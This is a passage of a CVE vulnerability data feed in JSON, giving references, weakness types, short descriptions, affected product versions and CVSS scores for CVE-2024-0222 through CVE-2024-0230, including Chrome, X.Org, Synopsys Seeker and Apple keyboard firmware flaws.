"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://security.gentoo.org/glsa/202401-34", "name" : "https://security.gentoo.org/glsa/202401-34", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.gentoo.org/glsa/202401-34", "name" : "https://security.gentoo.org/glsa/202401-34", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Use after free in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "120.0.6099.199", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-04T02:15Z", "lastModifiedDate" : "2025-06-18T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0223", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://crbug.com/1505009", "name" : "https://crbug.com/1505009", "refsource" : "", "tags" : [ "Permissions Required", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1505009", "name" : "https://crbug.com/1505009", "refsource" : "", "tags" : [ "Permissions Required", "Vendor Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://security.gentoo.org/glsa/202401-34", "name" : "https://security.gentoo.org/glsa/202401-34", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.gentoo.org/glsa/202401-34", "name" : "https://security.gentoo.org/glsa/202401-34", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Heap buffer overflow in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "120.0.6099.199", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-04T02:15Z", "lastModifiedDate" : "2025-06-18T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0224", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://crbug.com/1505086", "name" : "https://crbug.com/1505086", "refsource" : "", "tags" : [ "Permissions Required", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1505086", "name" : "https://crbug.com/1505086", "refsource" : "", "tags" : [ "Permissions Required", "Vendor Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://security.gentoo.org/glsa/202401-34", "name" : "https://security.gentoo.org/glsa/202401-34", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.gentoo.org/glsa/202401-34", "name" : "https://security.gentoo.org/glsa/202401-34", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Use after free in WebAudio in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "120.0.6099.199", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-04T02:15Z", "lastModifiedDate" : "2025-06-18T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0225", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://crbug.com/1506923", "name" : "https://crbug.com/1506923", "refsource" : "", "tags" : [ "Permissions Required", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1506923", "name" : "https://crbug.com/1506923", "refsource" : "", "tags" : [ "Permissions Required", "Vendor Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://security.gentoo.org/glsa/202401-34", "name" : "https://security.gentoo.org/glsa/202401-34", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.gentoo.org/glsa/202401-34", "name" : "https://security.gentoo.org/glsa/202401-34", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Use after free in WebGPU in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "120.0.6099.199", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-04T02:15Z", "lastModifiedDate" : "2025-06-18T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0226", "ASSIGNER" : "disclosure@synopsys.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-CVE-2024-0226-Affecting-Seeker", "name" : "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-CVE-2024-0226-Affecting-Seeker", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-CVE-2024-0226-Affecting-Seeker", "name" : "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-CVE-2024-0226-Affecting-Seeker", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Synopsys Seeker versions prior to 2023.12.0 are vulnerable to a stored cross-site scripting vulnerability through a specially crafted payload." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:synopsys:seeker:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2023.12.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-09T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0227", "ASSIGNER" : "disclosure@synopsys.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-11T20:15Z", "lastModifiedDate" : "2024-03-18T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0228", "ASSIGNER" : "security@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2024-0193." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-09T17:15Z", "lastModifiedDate" : "2024-01-09T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0229", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0320", "name" : "RHSA-2024:0320", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0320", "name" : "RHSA-2024:0320", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0557", "name" : "RHSA-2024:0557", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0557", "name" : "RHSA-2024:0557", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0558", "name" : "RHSA-2024:0558", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0558", "name" : "RHSA-2024:0558", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0597", "name" : "RHSA-2024:0597", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0597", "name" : "RHSA-2024:0597", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0607", "name" : "RHSA-2024:0607", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0607", "name" : "RHSA-2024:0607", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0614", "name" : "RHSA-2024:0614", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0614", "name" : "RHSA-2024:0614", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0617", "name" : "RHSA-2024:0617", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0617", "name" : "RHSA-2024:0617", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0621", "name" : "RHSA-2024:0621", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0621", "name" : "RHSA-2024:0621", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0626", "name" : "RHSA-2024:0626", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0626", "name" : "RHSA-2024:0626", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0629", "name" : "RHSA-2024:0629", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0629", "name" : "RHSA-2024:0629", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2169", "name" : "RHSA-2024:2169", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2169", "name" : "RHSA-2024:2169", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2170", "name" : "RHSA-2024:2170", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2170", "name" : "RHSA-2024:2170", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2995", "name" : "RHSA-2024:2995", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2995", "name" : "RHSA-2024:2995", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2996", "name" : "RHSA-2024:2996", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2996", "name" : "RHSA-2024:2996", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:12751", "name" : "RHSA-2025:12751", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0229", "name" : "https://access.redhat.com/security/cve/CVE-2024-0229", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0229", "name" : "https://access.redhat.com/security/cve/CVE-2024-0229", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2256690", "name" : "RHBZ#2256690", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2256690", "name" : "RHBZ#2256690", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An out-of-bounds memory access flaw was found in the X.Org server. This issue can be triggered when a device frozen by a sync grab is reattached to a different master device. This issue may lead to an application crash, local privilege escalation (if the server runs with extended privileges), or remote code execution in SSH X11 forwarding environments." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:x.org:xwayland:*:*:*:*:*:*:*:*", "versionEndExcluding" : "23.2.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:x.org:x_server:*:*:*:*:*:*:*:*", "versionEndExcluding" : "21.1.11", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_aus:8.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_tus:8.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_aus:8.4:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_tus:8.4:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_eus:8.6:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_eus:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_eus:9.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_eus:8.8:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-09T07:16Z", "lastModifiedDate" : "2025-08-04T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0230", "ASSIGNER" : "product-security@apple.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://support.apple.com/en-us/HT214050", "name" : "https://support.apple.com/en-us/HT214050", "refsource" : "", "tags" : [ "Release Notes", "Third Party Advisory" ] }, { "url" : "https://support.apple.com/en-us/HT214050", "name" : "https://support.apple.com/en-us/HT214050", "refsource" : "", "tags" : [ "Release Notes", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:apple:magic_keyboard_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:apple:magic_keyboard:-:*:*:*:*:*:*:*", "cpe_name" : 